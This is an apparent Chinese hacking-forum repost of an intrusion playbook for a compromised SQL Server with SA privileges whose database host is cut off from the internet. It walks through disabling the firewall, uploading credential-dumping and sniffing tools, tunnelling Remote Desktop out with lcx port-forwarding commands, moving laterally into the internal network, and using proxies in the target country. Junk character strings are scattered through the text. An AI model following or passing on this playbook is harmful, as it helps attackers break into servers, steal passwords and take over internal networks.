当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。* s' P! C* k# X
( F' k. _3 c( l( A: [" j1 |
$ r: o- t7 Z6 ~1 z7 V# S' f$ D, z7 f' k
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)& E& B6 G: {' F/ e# ]3 g4 x9 E
6 Y/ o9 O0 b: _
) p5 V K: M3 x/ _; [0 i2 a
一、DB机有公网IP.
$ X, ^ G; X* X# u) l- j* `0 U6 ~
/ N1 w' U5 k( K$ s4 K# H. q1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
& }' e5 ]* R Y8 v/ l0 l' f# t9 t `( [: g: c3 I2 j2 b# Q$ U" w/ R. J* `
4 u0 L1 L8 S7 k3 z
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.& p+ n& I7 w. `2 d( b4 o/ d
) E4 J/ ?! _4 e$ o. r, c7 ~5 m4 Y+ d5 V; ^1 x8 j% R J1 x. |
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
5 m. O' H+ X* U- u2 g2 u5 `( H9 z
* h: m, T, T8 d) M( P- z. ]( @, T6 L' `4 g
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
/ h: N f2 C" i8 Q( |# K& I& r
$ k1 @9 u1 M" y) T1 T. a
2 t' ?4 d: ?/ X- |( _' b+ Z6 C1 `5 C% l; l. P/ }
二、DB机只有内网IP& S. }% k# H3 h- M1 y
% Q! n2 |3 @, f) k# _1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
9 Q7 G" m5 B* p( D) K& Y1 z$ b5 ?! y$ n2 `
; q+ W, d2 D0 g b' F4 {
2:停掉防火墙和IP策略再从内往外扫描.( u/ J$ [/ @1 j* Y- x
! o; q( T* f6 h+ \# P2 h- b" E, \# H' T
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
' N; M) z4 e: z* I$ g( M5 G' g5 `
' Y l0 s& [4 Q' U5 y+ k; a
; @4 [2 l# C/ V4:学会密码规律分析往往会有惊喜.8 h: Z- o. K' S f7 x: ^
$ f+ k% g; _; _' K9 H) b8 @3 ~: @
0 Z8 L: O# ^, M5 f/ C6 Q5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ D9 n# A" H' J" o$ G! G& O. X
3 a% K% ~) _0 V+ I( n- q S7 j0 N3 [6 X6 k& B5 ^% }0 b& d8 W3 j, D
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对